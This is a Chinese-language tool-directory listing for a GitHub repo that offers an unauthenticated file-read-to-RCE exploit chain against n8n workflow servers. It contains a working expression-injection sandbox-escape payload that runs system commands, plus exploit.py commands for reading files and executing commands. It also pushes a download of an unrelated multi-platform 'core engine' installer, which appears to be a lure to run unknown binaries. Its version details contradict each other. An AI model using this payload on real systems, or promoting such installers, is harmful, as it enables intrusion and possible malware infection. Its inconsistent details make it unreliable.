Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ 官方 AI 安全工具模块,用于 CVE-2026-21858 + CVE-2025-68613(n8n "Ni8mare" 未认证任意文件读取与表达式注入 RCE 完整利用链)。 | Kitploit
工具/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试红队Payload 开发
AI 安全
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ 官方 AI 安全工具模块,用于 CVE-2026-21858 + CVE-2025-68613(n8n "Ni8mare" 未认证任意文件读取与表达式注入 RCE 完整利用链)。

查看仓库
14小时12分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛡️ AI 安全工具模块
n8n 全链路(CVE-2026-21858 + CVE-2025-68613)— “Ni8mare”

AI 安全工具生态官方安全审计模块


Latest Release Build Status Donations Telegram Channel License

🌐 网页演示 • 📚 项目网站 • 💬 社区聊天

网站导航: 首页 • 更新 • 下载 • 模块

AI Security Tool Banner


🧠 概念概述

本模块为 n8n 工作流自动化实例提供诊断工具和完整的利用链,代号 Ni8mare。

该攻击链结合了由 Content-Type 混淆导致的未认证任意文件读取(CVE-2026-21858)与已认证的表达式注入沙箱绕过(CVE-2025-68613)。通过向暴露的文件上传表单发送经过操纵的 Content-Type: application/json 请求,攻击者可控制 filepath 参数以读取内部系统文件(/proc/self/environ、配置文件及 SQLite 数据库)。获取到的 encryptionKey 和密码哈希可用于离线伪造管理员 JWT Cookie。一旦通过认证,通过 this.process.mainModule.require 进行的表达式注入即可逃逸 JavaScript 沙箱,执行任意系统命令。

🎯 核心影响理念

“从文件读取到完全系统接管,只需三步。”
虽然文件读取需要带有二进制输出的活动表单工作流,但表达式注入在默认 n8n 安装上即可可靠运行,无需特殊节点或显式启用系统权限。

📊 漏洞规格

规格分配值备注
CVE 标识符CVE-2026-21858 + CVE-2025-68613全链路:未认证文件读取到 RCE
严重性评级严重(CVSS v3.1:10.0 + 9.9)未认证 RCE 链
漏洞类型CWE-200 / CWE-94Content-Type 混淆 / 代码注入
受影响组件n8n 工作流自动化引擎版本 <= 1.65.0(AFR)/ >= 0.211.0(RCE)
已修补版本1.121.0(AFR)/ 1.120.4+(RCE)官方厂商补丁已发布
所需权限无通过公开表单进行未认证初始访问

🕸 攻击场景与架构

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 表达式注入载荷

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 缓解措施清单

  • 🟢 立即升级:将 n8n 实例更新至 1.121.0 或更高版本。
  • 🟢 限制工作流触发器:禁用公开的未认证表单工作流,或强制执行严格的文件验证。
  • 🟡 配置执行限制:设置 N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true,并限制 Docker 容器中的进程能力。

💻 如何运行本模块

⚠️ 重要:本模块专为在 AI 安全工具生态内安全执行和诊断而构建。请始终使用来自官方仓库的已验证模块。

1️⃣ 安装 AI 安全工具

要执行监控和诊断脚本,请确保已安装 AI 安全工具核心引擎:

操作系统 / 平台版本架构 / 格式发布日期状态下载链接
🪟 Windowsv6.3.20x64 安装程序(.exe)2026-09-08🟢 最新下载 .exe
🪟 Windowsv6.3.20x64 便携版(.tar.gz)2026-09-08🟢 最新下载 .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3(.dmg)2026-09-05🟢 稳定下载 .dmg
🐧 Linuxv5.3.27通用 x64(.tar.gz)2026-09-01🟢 稳定下载 .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK(.apk)2026-09-01🟢 稳定下载 .apk

2️⃣ 控制台执行

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 安全审计模块与 PoC 仓库

由我们社区维护的漏洞扫描模块、PoC 脚本和研究仓库:

🔥 远程代码执行(RCE)与网络漏洞 5 个模块
  • CVE-2026-21858 — n8n 全链路未认证 RCE(Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon 远程代码执行漏洞利用 @ZeroDayEvil
  • CVE-2026-20805 — Windows 远程代码执行概念验证 @ZeroDayEvil
  • CVE-2026-41096 — 严重 RCE 漏洞扫描模块 @ZeroDayEvil
  • CVE-2026-24291 — 网络协议远程代码执行 @ZeroDayVPN
🛡️ 权限提升(EoP)与服务 3 个模块
  • CVE-2026-54121 — AD CS Certighost 域控制器模拟 @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice 服务权限提升 @ZeroDayVPN
  • CVE-2026-50416 — 本地权限提升分析与 PoC @ZeroDayEvil
📚 漏洞研究与分析报告 2 个模块
  • CVE-2026-42978 — 深度技术分析与 PoC 研究 @ZeroDayEvil
  • CVE-2026-83991 — 完整分析报告与漏洞利用演示 @ZeroDayVPN

⚖️ 许可证与法律免责声明

🚨 免责声明

本工具及技术分析严格用于授权系统审计、研究和渗透测试。
对未授权目标执行漏洞利用链属于违法行为。作者对未经授权的访问、数据丢失或系统中断不承担任何责任。请严格在授权范围内操作。

🔄 贡献与社区

我们欢迎安全研究社区的贡献!主要贡献方向:

  1. AI 集成:添加新的 LLM 提供商并开发专用安全代理。
  2. 安全工具:开发漏洞模块并集成 CLI 扫描器。
  3. 优化:提升解析器速度、执行安全性和缓存逻辑。
  4. 文档:撰写研究论文、指南和本地化翻译。

🔗 联系与支持

  • 官方网站: ZeroDayEvil.com
  • 原始研究: Cyera Ni8mare 分析报告
  • Telegram 管理员: @ZeroDayEvil
  • Telegram 聊天: @ZeroDyaTool_chat
  • Telegram 频道: @ZeroDyaTool_channel
  • 赞助项目: PayPal 捐赠
  • Open Collective: opencollective.com/ZeroDayEvil

AI 安全工具 — 为网络安全专业人员重新构想终端工作流与自动化。

下载工具